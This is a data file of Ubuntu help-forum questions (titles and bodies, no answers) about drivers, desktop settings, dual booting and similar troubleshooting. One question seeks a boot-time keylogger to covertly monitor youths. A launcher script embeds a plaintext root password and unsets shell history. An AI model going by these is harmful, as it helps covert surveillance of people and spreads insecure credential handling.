-- - [ end trace 582a116d2bf2b697 ] -- - jan 6 06:25:53 ubuntu kernel : [ 678.244049 ] r8169 0000:03:00.0 : eth0 : link up system cpu : intel celeron g530 motherboard : msi h61m-e23 ( b3 ) ram : samsung ddr3-1333 2x4gb hdd : wd caviar blue wd10ealx 1tb tp-link tg-3269 pci gigabit ethernet card os : ubuntu 11.10 the onboard lan ( eth1 ) is working without any problem .
93613	control panel ubuntu one works only when i login as admin	control panel ubuntu one works only when i login as admin . as a user the initial window will open . but not window will open if , i check on `` i already have an account '' . syncing files , contact and notes works fine . only control panel does not .
93623	how can i disable the default unity dock ?	i never liked this dock , so i install cairo dock , but the problem is that now i 've got the both : s so i do n't know if is better have the classic ubuntu or disable the only the dock , so please i need help , what do you suggest me ? and explain me please , i 'm a noob with ubuntu yet . thx for reading .
93624	how do i swap left ctrl with left alt on my keyboard ?	there is no such option in keyboard layout options which is sad . how can i do it manually ?
93627	use kinect camera as a webcam in ubuntu	i have a python opencv program that uses a webcam to track an image target . i switched computers , but this new computer does not have a webcam . i hooked up my kinect , installed stome stuff from openkinect.org ( can now use glview ) , and would like to use the kinect camera as a webcam for this program . how can i do this ? the program i wrote is : http : //pastebin.com/usspqxnu
93629	ubuntu 10.10 on a dell inspiron 6000	according to my service tag i have a 64mb , i6000 , m22 surface mount graphics card when i first installed ubuntu the tool bars were all distorted . i updated to 10.10 ( after many attempts where it would get stuck half way through the installation ) and now only the tool bars show up . anything on the main section of the screen shows up black.i can try clicking around aimlessly and the windows i open are there i just ca n't see them.any ideas ?
93630	why does my screen not return to full brightness when waking a lenovo b570 from sleep mode ?	i have a lenovo b570 laptop and have ubuntu 11.10 installed . my problem is that when the screen is turned off through inactivity ( set at 10 minutes in the settings ) , it is very difficult to reawaken the laptop because the screen does n't 'wake up ' to full brightness so that i can re-enter my password . at first i thought that moving the mouse or pressing a keyboard button had no effect and the screen remained black , but in fact the screen does wake up and show the dialogue box to enter my password but the brightness has been turned down to the lowest level so if i squint very hard i can see the password entry dialogue box . but my hardware brightness keys ( fn + up/down ) do not work ( though they work fine in every other circumstance ) . i can unlock by entering my password 'blind ' which unlocks the screen but leaves the brightness levels at the lowest possible , now the hardware brightness keys do work . seems strange behaviour though . if i do a normal lock screen ( ctrl + alt + l ) there are no brightness problems so it must be something to do with the `` turn screen off after 10 minutes '' ( possibly a fault with gnome-screensaver ? ) the same behaviour occurs when the laptop is on ac power or running from the battery . having searched around the subject a bit more this question seems very similar , though there was no real answer proposed : screen sleeps , but cant be rewoken on an hp nx6310 potentially as this may be a fault in the kernel might it be a good idea to update to the 12.04 version of the kernel ? and if i needed to report this as a bug on launchpad what package would i say was involved ? thanks for any time and help .
93632	keyboard messed up in both windows and ubuntu after updates	i just installed ubuntu 11.10 with wubi to try it out on my asus n82j notebook . problem is that during the software updates after installation , the keyboard got messed . like when i press `` o '' it appears `` no '' , `` b '' reproduces `` ba '' , stuff like that . i changed layouts many times and problem continues . so i changed back to windows to search on internet what it could be and for my surprise , windows is having the same issue . other thing that i noticed is that windows had the same clock time as ubuntu . anyone knows what can i do ? thanks in advance .
93637	how do i install my printer with ubuntu ?	how do i install my printer with ubuntu ? the printer disk is only supported by windows .
93638	local time with dual-boot	i have a dual-boot pc ( ubuntu/windows 7 ) . when i boot with ubuntu my local time ( rome fuse ) is correct . but when i boot with wimdows my time is one hour slow . how can i solve this problem ?
93644	installing fonts for a specific program	i have to install the following fonts on ubuntu for a program to run : # here starts the tk part ... # my $ qfont= $ tl- > x11font ( '-*-new century schoolbook-medium-r-* -- 40-*-*-*-*-*-iso8859-1 ' ) ; # my $ qfont= $ tl- > x11font ( '-monotype-arial-medium-r-*-*-50-*-*-*-*-*-iso8859-* ' ) ; my $ qfont= $ tl- > x11font ( '-*-freesans-medium-r-*-*-50-*-*-*-*-*-iso8859-* ' ) ; print `` question-font : \n $ qfont\n '' if ( $ debug ) ; # my $ tfont= $ tl- > x11font ( '-*-helvetica-medium-r-* -- 30-*-*-*-*-*-iso8859-1 ' ) ; # my $ tfont= $ tl- > x11font ( '-bitstream-*-medium-r-*-*-45-*-*-*-*-*-iso8859-1 ' ) ; my $ tfont= $ tl- > x11font ( '-*-freesans-medium-r-*-*-40-*-*-*-*-*-iso8859-* ' ) ; print `` title-font : \n $ tfont\n '' if ( $ debug ) ; # my $ sfont= $ tl- > x11font ( '-*-freemono-medium-r-*-*-10-*-*-*-*-*-iso8859-* ' ) ; my $ sfont= $ tl- > x11font ( '-*-freesans-medium-r-*-*-20-*-*-*-*-*-iso8859-* ' ) ; print `` small-font : \n $ sfont\n '' if ( $ debug ) ; my $ fixedfont= $ tl- > x11font ( '-*-freemono-medium-r-*-*-*-*-*-*-*-*-iso8859-* ' ) ; print `` fixed-font : \n $ fixedfont\n '' if ( $ debug ) ; my $ utf8font= $ tl- > x11font ( '-*-freemono-medium-r-*-*-*-*-*-*-*-*-iso8859-* ' ) ; print `` utf8-font : \n $ utf8font\n '' if ( $ debug ) ; i extracted this from the program sourcecode . could you please tell me how to install these fonts ?
93649	replace windows 7 with ubuntu install option	i selected the `` replace windows 7 with ubuntu '' install option when i first got my portege laptop and now i regret the decision . i did n't fully understand how dual boot worked at the time but now i understand the advantages . i do n't have a recovery cd ( toshiba does n't include them ) . the hold '0 ' and boot option does not work . what alternatives to ordering a recovery cd from toshiba do i have ?
93654	why does my computer get less battery life with ubuntu compared to windows ?	last year i purchased a dell inspiron 5315 laptop shipping with windows 7 preinstalled . i installed ubuntu 10.10 alongside it with dual-booting . on upgrading to ubuntu 11.10 , i was upset to find i now get less than one hour of battery life ! windows 7 gives me 2.5 hours of running time . is there any possible explanation why my battery is running out faster with ubuntu ? can anybody tell me better power options ?
93655	open windows appearing over unity dash	when i launch the unity dash in ubuntu 11.10 , any screenlets or open windows on the desktop display in front of the dash instead of being hidden . i have a toshiba nb305-n410bl netbook , 1.66ghz intel atom processor , 2gb of ram , 250gb hdd and intel gma 3150 graphics . any help will be greatly appreciated . thanks
93659	how do i get a belkin f5d6050 wireless usb network adapter to work ?	the title question says it all . i 've been working to answer it for my computer for the last 12 hours . i 've read many articles , attempted many tricks and am more or less where i was with this problem at the start . i wo n't waste breath here citing a bunch of info that may not be needed to resolve the issue , so i 'll just follow the title question with this : what do you need to know about my setup , hardware , software or experience to help me ( and struggling users like me ) get at a solution ? thanks in advance . +ralston update : jan 9 at the direction of fossfreedom i 'm sharing the output of multiple terminal commands . command : rfkill list all usb adaptor : plugged in . yield : absolutely nothing . ( entered this command multiple times to make sure i was getting it right . each time no result was returned by the terminal . ) command : sudo lshw -class network usb adaptor : plugged in . yield : displays pci ( sysfs ) for just a few seconds then produces the following : *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : f bus info : pci @ 0000:02:0f.0 logical name : eth0 version : 10 serial : 00:0e : a6:42 : ba:24 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=full ip=192.168.1.88 latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:19 ioport : b800 ( size=256 ) memory : feafec00-feafecff command : lsusb usb adaptor : plugged in . yield : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 050d:0050 belkin components f5d6050 802.11b wireless adapter v2000 [ atmel at76c503a ] bus 003 device 002 : id 046d : c03d logitech , inc. m-bt96a pilot optical mouse bus 003 device 003 : id 0b38:0010 gear head 107-key keyboard command : dmesg usb adaptor : plugged in and unplugged . yield : this command displays quite a bit of data . i pasted it all here -- both the results from when the device was plugged in and unplugged . however , when i attempted to post the updates to my question here with all that data , i got this `` oops '' message : `` body is limited to 30000 characters ; you entered 74516 . '' if this info is really needed to help troubleshoot my problem , i think i 'm going to need another way to post it . or , if there is a particular line or set of lines that is most important in the results of the dmesg command , please let me know and i 'll look for it and add it here . update : jan 9 used the paste.ubuntu.com service for the dmesg command results . both unplugged and plugged in results can be seen below . command : dmesg usb adaptor : unplugged . yield : pasted unplugged results this command displays a lot of data . i 'm not sure if the terminal has some line limit , but it looks as if the results of this command exceeded that limit . if it is necessary , please let me know if there is some way to pause the results like dir /p in dos . command : dmesg usb adaptor : plugged in . yield : pasted plugged-in results i have n't got through each line to note any differences ( not even sure what i 'd be looking for ) , but here are the results .
93669	how to change screen output to hdmi , when laptop screen is broken ?	my laptop ( samsung n510 ) screen is broken and i 've recently tried to install ubuntu 11.10 . i 'm planning to use the laptop with hdmi connected to my tv . while installing from a usb stick , both laptop screen ( cracked with just light on ) and my tv is displaying . when installation is finished and it reboots internal screen is the only one displaying . since i can not see anything on that screen i was wondering if there are some way to type some kind of a shortcut or how to get into the settings without seeing anything . i 've tried the fn+f4 buttons that has the screen on it , but nothing happens . i 've also tried plugging hdmi cable in before startup , nothing happens , plugging the hdmi cable in while it 's on does not work either . i 've tried unplugging my laptop screen before startup , with hdmi plugged in , ( worked in windows ) but then the laptop wo n't boot . is it impossible ?
93670	i tried to use xubuntu with compiz , i see a different decoration theme ( very transparent ) that leave traces all over the desktop and its annoying ?	i tried to use xubuntu with compiz , i see a different decoration theme ( very transparent ) that leave traces all over the desktop and its annoying ! ! i must have installed compiz cause if else i have tearing on video playback ! i start compiz with the command compiz -- replace right now i have ubuntu 11.10 installed but if you know the answer i would be glad to move to something much lighter and faster .
93671	should i restart after updating my system ?	should i restart my pc every time it gets updated ?
93678	how can launchers be added to and removed from the unity dash ?	scenario # 1 : manually removing launchers i installed a few games from the recent humble indie bundle and removed them today . the games which were installed using a deb were successfully uninstalled and removed from the dash , however , the games that i installed using the .run format are still in my menu and dash even after uninstalling them ... how do i remove those items ? scenario # 2 : adding custom launchers i have created wine shortcuts to card games on my windows partition . i added these launchers in alacarte ( menu editor ) and they worked fine in classic gnome , however they are not appearing in the games section of the unity dash . is it possible to add launchers for these games to the dash , or do i have to add the launchers to the desktop ?
93679	how can i open .tc extensions in truecrypt by default and mount automatically ?	i have truecrypt installed on my ubuntu 64 bit machine and i have many truecrypt partitions that i share with friends . its not always convenient to : open truecrypt > browse to the file and then mount . is there a way of configuring so that when i double click the .tc file it directly opens in truecrypt and accepts the root and volume password and mounts it automatically ?
93687	why ca n't i access windows from grub after installing ubuntu ?	i 'm new to ubuntu and just installed it on my hp compaq nx5000 . i dual-boot installed with windows xp . when i boot , it goes to the grub bootloader . at the bottom of the grub list it says boot windows xp professional . but when i select the last one and press enter , no matter how many times i try , it either loads ubuntu or goes back to the bootloader .
93688	can i legally build and sell desktops with ubuntu pre-installed ?	i 'm starting a business and this is part of what i 'm going to be offering . i 'm almost complete with my certification in linux administration , but i do n't know all of the ins and outs of the law linux is under ...
93692	no prompt after successful ssh login	after a successful login to my vps the command prompt does n't get displayed . i 've ran ssh with -vvv and sshd with debug output , absolutely nothing is amiss . the vps is ubuntu 11.04 , the client ubuntu 11.10 , sitting behind a router . the strange thing is my laptop ( also ubuntu 11.10 ) behind that same router connects and gets the command prompt no problem . /var/log/auth output is here ssh -vvv output is here since the laptop gets the command prompt without issues , i 'm guessing the problem is with my desktop . can i do like a flush of everything ssh related in case i screwed something up ? i 've tried deleting ~/.ssh/knownhosts but that did n't do it .
93701	how to add apps that does n't appear on dash home to launcher ?	today i 've spent all day trying to fix an ubuntu 11.04 but i failed . i did n't wanted to upgrade one step further because i am trying to avoid unity , but i had to recover that pc so i installed 11.10 , now after a few hours i am not hating it so much , i kinda like it but i still do n't quite understand some things . for example , i found i was able to drag and drop apps from the dash home results to the left bar and they will get `` sticked '' there , but later i installed virtualbox , which does n't appear on dash home results ( but if i type it on a console it does launch fine ) . so how could i add virtualbox to the left bar when i ca n't find it on dash home search results to drag and drop it ? i do n't just want to add the main virtualbox to the bar , but also the virtual machines shortcut , like i use to do in previous ubuntu versions by just adding an application launcher to the menu .
93703	how do i get samba and cups installed onto ubuntu unity 11.10 and recognize my network printers	i have a hp930c printer installed on an older machine with windows 2000 . i had it working up ubuntu 9.10 and also have a network printer lexmark x7600 on a wired lan connection . i was able to get them working with samba and was able to print to them . i wo n't hook the lexmark to work with wifi because of security concerns .
93709	ca n't run or install ubuntu 10.10 netbook edition	before this i had run ubuntu 10.04 netbook edition on my lenovo s10-3c but i just figure out ubuntu 10.10 is a newes ubuntu for netbook.so i just download the iso ubuntu 10.10 netbook edition.but here is my problem i ca n't run it or install it on my netbook.it 's just came out ubuntu boot logo and i wait for 10 minutes but nothing happen.can someone help me in this problem ? ?
93710	update-alternative command not found	i want to run the following : sudo update-alternative -- config java however , the update-alternative command is not found . how do i fix this ?
93712	eclipse `` clean '' reinstall unable to update	i managed to botch up my eclipse installation by installing a plugin ( motodev studio ) . in an attempt to fix the problem i decided to go ahead and do a full reinstall of eclipse . i followed the suggestion in this post to remove eclipse and delete the plugins . i also completely deleted my workspace folder to get rid of any configuration files there since all my projects were just tutorial programs . the exact issue i 'm having : help > check for updates some updates are listed but at the top of the dialog box just below `` available updates '' it says : `` the operation can not be completed . see the details '' under details it says `` there were no installable units selected when the plan was computed . '' if i select the listed updates and attempt to install them then i get the error : `` can not complete the install because of a conflicting dependency . '' i think it must be an issue with some relics of the previous installation but i 'm not sure where else to look for files to delete so i can get a clean start .
93718	how do i prevent .xsession-errors from eating disk space ?	is there any way to completely disable the .xsession-errors file ? i have it as a symlink to /tmp so that my laptop hard disk can ( hopefully ) go to sleep for once , but at least 95 % of the stuff in the file ( it fills up at about 500k an hour ) is ... ( nautilus:1618 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed which is total garbage to me . i have tried doing a symlink to /dev/null but that does not work ( the resulting link is overwritten ) , and i also do not want the activity so that hopefully my laptop can go to sleep for once . i am using ubuntu 11.04 , with no special add-ons to nautilus .
93719	no tv out or s-video out with intel gm965 graphics	i have in the past on the same laptop been able to get tv out and s-video out working , but now i can not do it . the vga output works fine , but i can not connect it to any tv that does not have that . the documentation seems pretty sparse on this one , and the fact that with previous versions of ubuntu it worked makes this problem more irritating . here is the relevant output of lspci . 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 0133 flags : bus master , fast devsel , latency 0 , irq 45 memory at fc000000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 1800 [ size=8 ] expansion rom at [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 3 kernel driver in use : i915 kernel modules : intelfb , i915 this has all worked with this exact laptop before , so that makes it even more annoying . has anybody else had this kind of experience and how did you fix it ?
93720	is there a difference between ubuntu gnome-shell and fedora gnome-shell ?	i am using ubuntu 11.10 with gnome-shell installed . i often hear people talking about the `` pure gnome-shell experience '' with regards to fedora . what does this mean ? are there differences between the two ?
93723	how to findout web history in ubuntu ?	i have gifted my 15yrs son a dell laptop in which ubuntu 10.10 has pre installed , wan na trace what whether he is using the net in proper way or not . please suggest me how to findout what he browsing online . do we have any tool to findout search history for 15days what he did ? thanks in advance .
93728	how to install internet explorer ?	any body can tell me how can i install ms internet explorer on my ubuntu 11.10.i tried it by following two ways wget http : //www.tatanka.com.br/ies4linux/downloads/ies4linux-latest.tar.gz tar zxvf ies4linux-latest.tar.gz cd ies4linux-* ./ies4linux i have also installed following two packages too sudo apt-get install wine sudo apt-get install cabextract but it fails to install
93729	install penetration tool on ubuntu 11.10	how to install penetration tool on my ubuntu 11.10 from blackbuntu or backtrack source and fugure out it 's work or not.thank for helping
93730	if i make a script that requires root privileges , do i need to put sudo in the script too ?	i 'm working on an installer script for the latest ati drivers ( as they are not in repo ) and was wondering if i need to include sudo in the script , because it will be needed for the install .
93735	why is n't my custom launcher working ?	i am trying to create a launcher for the left bar on ubuntu 11.10 , i followed this answer , and it works , but i want to auto login into the ssh servers , so i tried using a command i have used before , something like : expect -c 'spawn ssh root @ 111.222.333.444 ; expect assword ; send `` password123\n '' ; expect root @ ; send `` unset histfile\n '' ; interact' that works fine when typed on a console directly , but when i put it on my shortcut exec= section , then i click the launcher icon and nothing happens , there 's no terminal with ssh opened or anything else . this is how the shortcut file loos like : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 name=remote servers comment=login to my servers exec=notify-send `` select a server '' `` you have to select a server to ssh into '' -i /usr/share/icons/gnome/256x256/status/messagebox_warning.png -t 5000 terminal=false x-multipleargs=false type=application icon [ en_us ] =/home/username/.icons/ssh.png startupnotify=true startupwmclass=remoteservers x-ayatana-desktop-shortcuts=server1 ; server2 ; [ server1 shortcut group ] name=ssh into 111.222.333.444 exec=expect -c 'spawn ssh root @ 111.222.333.444 ; expect assword ; send `` password123\n '' ; expect root @ ; send `` unset histfile\n '' ; interact' targetenvironment=unity [ server2 shortcut group ] name=ssh into 111.222.333.444 exec=expect -c 'spawn ssh root @ 111.222.333.444 ; expect assword ; send `` password123\n '' ; expect root @ ; send `` unset histfile\n '' ; interact' targetenvironment=unity i though this would work because i 've created another shortcut to launch a virtual machine , i created it using gnome-desktop-item-edit -- create-new , and the command in `` exec= '' is just the same as when typed on the console . anyone knows how could i get this working ?
93742	how to create a windows7 image from an sd card	question : i have an sd card , with windows 7 files in it ( as in any bootable dvd ) and i want to use it , to install windows7 in an ubuntu virtualbox . how to make that happen ?
93746	how can i disable the meta key from opening the activities overview ?	like the question says , how can i disable the meta ( windows ) key from showing the gnome shell activities overlay ?
93748	control two instances of evince from one script	i am looking for a way to synchronize two instances of evince , so when one of them move a page up or down , the other one will do the same . this is for running a dual-head pdf presentation , where once screen shows the presentation itself , and another the notes . i suppose this involves monitoring dbus messages for one instance and sending dbus commands to the other one , but i could n't find a detailed documentation of these options . i 'll appreciate pointers or ideas . also , if the same trick could be done by another pdf reader ( acroread , xpdf , etc . ) , it also works for me .
93754	network up and down usage indicator	is there an applet that shows an indicator on the top bar that shows the network up and down usage in kb/mb ( not % ) i have come across `` indicator-network '' but apparently it has device issues ? anyway im sure there 's a simple applet for this . im using 11.10 cheers
93770	how to rearrange the panel indicators ?	i 'm using ubuntu 11.10 x64 with unity environment and i need to rearrange the indicators on the top panel . how can i do that ?
93772	where do i find a list of all x keysyms these days ?	they used to be in /usr/lib/x11/xkeysymdb or /usr/share/x11/xkeysymdb , but those have been missing from ubuntu for a while . i 've tried google , but all i get are more references to xkeysymdb or the outputs of different people 's xmodmap -pke . where is the concise list ?
93773	set desktop default to unity 2d remotely ?	is there a way that i can set the default desktop to unity 2d without logging out ? i need to achieve this remotely as i do n't have direct access to the computer .
93775	manually installed files to display in dash	i download an application from a website in its .tar.bz2 form as opposed to through apt-get or through the software center as i usually do ( i do n't think it matters but just in case , the application in question is sublime text 2 ) . to install it i just extracted the folder to /usr/share with sudo privileges however i ca n't seem to be able to add it to the dash , i know i can pin it to the launcher but i would like to know how to properly install files myself as this is clearly the incorrect way of doing it . thanks in advance .
93776	how do i login/logout change with ati/intel hybrid graphics ?	i have hp pavilion dv6 6030et . i want to use my ati radeon hd 6770m driver instead of intel mesa driver .
93778	what x keysym to use for rfkill / flight mode ?	on my laptop fn+f12 toggles flight mode in windows . i 'd like the same functionality in linux and am looking for the appropriate x keysym that will invoke the equivalent of rfkill block all when mapped with xmodmap . i can see there is xf86wlan and xf86bluetooth , but they are not what i 'm after . i want it to kill/enable all radio devices . i 'm not after the script that would do this ( see here for example ) , but wondering if ubuntu has this functionality already hooked up and if so , what keysym to set up in xmodmap .
93779	need an image editor with simple font selection	i need to add bookmarks as text to my images ( if possible with certain levels of opacity ) , currently i have gimp , xpaint and gnome paint drawing editor . but all these are not good to simply adding a text and decide their colour , bold / italic , font and location with ease . gimp does somewhat , but i felt it quite pro for such a basic function . i would like a simple too which can add text on a image . i used photoscape in windows but i am avoiding wine at the moment . please help .
93788	selection files and folders in nautilus	wondered then a question . when selecting a few folders in nautilus which , in turn , have the files and other directories , which , in turn , is also the files , in nautilus by selecting `` properties '' from the context menu shows only the number of all objects inside , ie . considers the number of files together , and the number of subdirectories . how to make shown separately the number of files and number of directories , ie , how many of those and those ?
93791	which one is the best window loader for ubuntu11.10 ?	i want to install window loader but i still confuse to choose which one is compatible for my ubuntu 11.10.which is you all recomended wine or play on linux ? ? thankyou for your time
93796	file sync iphone4 ( ios5 ) auto camera-upload does n't work	basically the camera roll auto-upload feature does not seem to work , nothing is happening , no files exist in the `` pictures - name '' folder . i have a few questions on this : how do i know if auto uploading is actually ongoing ? when will u1 file app be syncing ; when app is active and/or running in background , always , other ? will it upload all photos on my iphone , camera roll and photo stream ? when i navigate the the pictures-name folder in u1 files and add a photo from my cameraroll , should something happen ? ( as it is now , nothing happens ) could i expect u1 files to work on ios 5.0.1 ? sincerely knut
93802	how do i fix the window grid feature ?	i recently noticed that my ubuntu 11.10 `` window-grid '' function is not working normally . it simply does n't respond to my window drags to edges . i installed compizconfig-settings-manager and checked the settings on the grid option and it seems to be all set , although it 's not working yet . how should i approach the problem ?
93805	monaco font in konsole	i ca n't set monaco font in konsole but it installed in the system . how can i set monaco as my terminal font ?
93807	how can i reinstall usbatm	i 'm trying to install my sagem-fast-800 modem but it never works . actually , the modem is operational but the it does n't connect . there 's no ppp0 interface after i call pppd . i tried to figure out the problem and what i found is this http : //pastebin.com/bt9feynu when i tape dmesg . that 's why i 'm looking to reinstall usbatm . regards , hamza n .
93809	nvidia quadro nvs 160m in the dell latitude e6500	how can i install nvidia quadro nvs 160m driver for my dell latitude e6500 ? i downloaded nvidia-linux-x86-290.10.run by searching in nvidia site . after download i stop lightdm service and then run nvidia-linux-x86-290.10.run with sudo sh nvidia-linux-x86-290.10.run but in install process i see error message and installation progress stops .
93812	ubuntu copy on select	in ubuntu , if i select something on the terminal , it is only available within the terminal via middle click , but i am not able to paste the selected text in other applications ( like my browser ) , without having to explicitly do a right-click-copy first . this is very annoying . is there a setting where i can change this behavior to copy everywhere on select , much like it works across x ?
93813	logkeys and screen capture	i am a kind of newbie and need to get control over my pupils , i. e. work at a youth home and have to have total control over the internet activity of some of the criminal youths over here . how do i install logkeys for ubuntu 11.10 natty narwhal and have it running from boot ? i thank you in advance .
93814	slow window movement with unity on amd 6950	i am new to ubuntu and i like it . i have some issues with the window movement performance ( in unity ) . my pc has a amd phenom x4 955 processor , 4 gb ram and amd hd 6950 graphics card . so its not that slow , but the windows ( nautilus , firefox - just about any window really ) move very sluggishly . i tried it with the amd driver that ubuntu provides ( fglrx driver , the standard , not the newest ) and without it . i have installed compiz config and disabled the vsync , and also tried to switch vsync in the catalyst drivers on and off . nothing seems to work . sometimes the window movement is perfectly smooth for a moment , then it gets slow as hell again . the other effects like minimizing are working very smooth . any ideas what to do ? it 's really annoying .
93820	how do i migrate an ubuntu installation to a home folder partition ?	i have two partitions of ubuntu installed on my samsung n150 plus . one is 11.04 ( 90gb ) and one is 11.10 ( 60gb ) . all my documents are on the 11.04 home folder , but they are too big to cut and paste into 11.10 . i would like to remove the os from 11.04 and use that partition as my home folder in 11.10 . any easy step-by-step guide on how to do this would be appreciated . note : i have a cracked screen , and can not always see what 's on the screen of my samsung ; nothing displays on my external monitor until i 've already booted .
93821	custom ubuntu server install	i 'm just about to get a new tower server which i 'm going to put ubuntu server on . the problem is the server does n't have an optical drive . - i could take one out of an old machine i have , but it may be easier to install from a usb disk ? ( the server has 7 usb ports ) ... the other problem is the memory stick i have on me is only 520 mb . so , my problem comes down to cutting the 700 mb or so ubuntu server install down to 520 . is it possible to create a custom install disk with just the stuff you need ? for example , i only need the following of the major packages open ssh server lamp i do n't need for example print server smb server any of the other options also , the only language / keyboard setup i need is english ( uk ) . if it is possible to make a custom install : how ? would removing all other languages except english , and removing all the packages i do n't need ( not ssh/lamp ) , be enough to cut the install down to 520 mb ? thanks for any advice - i 'm a bit of an ubuntu noob and have only used the server/desktop once before . if it is important - the system i 'll be making the bootable disk on is a mac .
93825	how to get a aero feel in ubuntu ?	is it possible to get aero effect in ubuntu 11.10 ? just switched from windows 7 64 bit and the looks are a bit classic in ubuntu . also any tips and tricks on appearance is most welcome . thanks : )
93828	no text displayed in firefox 9 webpages	11.04 64bit and there is a problem with firefox . firefox does n't display texts in websites for example in www.yahoo.com it does n't show any text ( for example there is mail javabutton but it does n't have text on it ! ) and when i click on javabuttons nothing happen ! ! even it does n't show news texts on this site . and there is same problem in other sites . i removed firefox completely and install it again but it did n't fix . please help me !
93830	is there an equivalent to netscan ?	i use netscan in windows to browse network shares on lan . i can see all the network shares at one place and open them by a mere click . can i do same on ubuntu , is there any netscan for ubuntu which can exactly do the same
93836	ubuntu one file sync error : ssl handshake	ubuntu one repeatedly tries to sync my files but keeps disconnecting before anything is uploaded . here are some of the messages from syncdaemon.log : 2012-01-08 12:12:34,068 - ubuntuone.syncdaemon.actionqueue - info - connection started to host fs-2.ubuntuone.com , port 443 . 2012-01-08 12:12:34,256 - ubuntuone.syncdaemon.actionqueue - info - connection made . 2012-01-08 12:12:34,257 - ubuntuone.syncdaemon.storageclient - info - connection made . 2012-01-08 12:13:08,832 - ubuntuone.syncdaemon.storageclient - info - connection lost , reason : [ failure instance : traceback ( failure with no frames ) : < class 'openssl.ssl.error ' > : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] ] . 2012-01-08 12:13:08,833 - ubuntuone.syncdaemon.actionqueue - info - the request 'protocol_version ' failed with the error : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] 2012-01-08 12:13:08,844 - ubuntuone.syncdaemon.actionqueue - warning - connection lost : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] 2012-01-08 12:13:38,550 - ubuntuone.syncdaemon.main - note - -- -- mark ( state : < state : 'waiting ' ( queues working connection 'with user with network ' ) > ; queue : 1378 ; hash : 0 ) -- -- 2012-01-08 12:15:08,870 - ubuntuone.syncdaemon.actionqueue - info - connection started to host fs-2.ubuntuone.com , port 443 . 2012-01-08 12:15:09,033 - ubuntuone.syncdaemon.actionqueue - info - connection made . 2012-01-08 12:15:09,034 - ubuntuone.syncdaemon.storageclient - info - connection made . 2012-01-08 12:15:33,676 - ubuntuone.syncdaemon.storageclient - info - connection lost , reason : [ failure instance : traceback ( failure with no frames ) : < class 'openssl.ssl.error ' > : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] ] . 2012-01-08 12:15:33,677 - ubuntuone.syncdaemon.actionqueue - info - the request 'protocol_version ' failed with the error : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] 2012-01-08 12:15:33,692 - ubuntuone.syncdaemon.actionqueue - warning - connection lost : [ ( 'ssl routines ' , 'ssl23_read ' , 'ssl handshake failure ' ) ] 2012-01-08 12:15:38,551 - ubuntuone.syncdaemon.main - note - -- -- mark ( state : < state : 'waiting ' ( queues working connection 'with user with network ' ) > ; queue : 1378 ; hash : 0 ) -- -- i 'm using ubuntu 11.10 .
93840	mouse is n't recognized	lsusb says : chris @ cnb : /var/log $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 12d1:1001 huawei technologies co. , ltd. e620 usb modem bus 001 device 004 : id 0bda:0158 realtek semiconductor corp. mass storage device bus 001 device 003 : id 174f:1127 syntek bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub xorg.0.log : ( ii ) config/udev : adding input device sigmachip usb mouse ( /dev/input/event9 ) ( ** ) sigmachip usb mouse : applying inputclass `` evdev pointer catchall '' ( ** ) sigmachip usb mouse : always reports core events ( ** ) sigmachip usb mouse : device : `` /dev/input/event9 '' ( ii ) sigmachip usb mouse : found 3 mouse buttons ( ii ) sigmachip usb mouse : found scroll wheel ( s ) ( ii ) sigmachip usb mouse : found relative axes ( ii ) sigmachip usb mouse : found x and y relative axes ( ii ) sigmachip usb mouse : configuring as mouse ( ** ) sigmachip usb mouse : yaxismapping : buttons 4 and 5 ( ** ) sigmachip usb mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ii ) xinput : adding extended input device `` sigmachip usb mouse '' ( type : mouse ) ( ii ) sigmachip usb mouse : initialized for relative axes . ( ii ) config/udev : removing device sigmachip usb mouse ( ii ) sigmachip usb mouse : close ( ii ) unloadmodule : `` evdev '' thank you in advance .
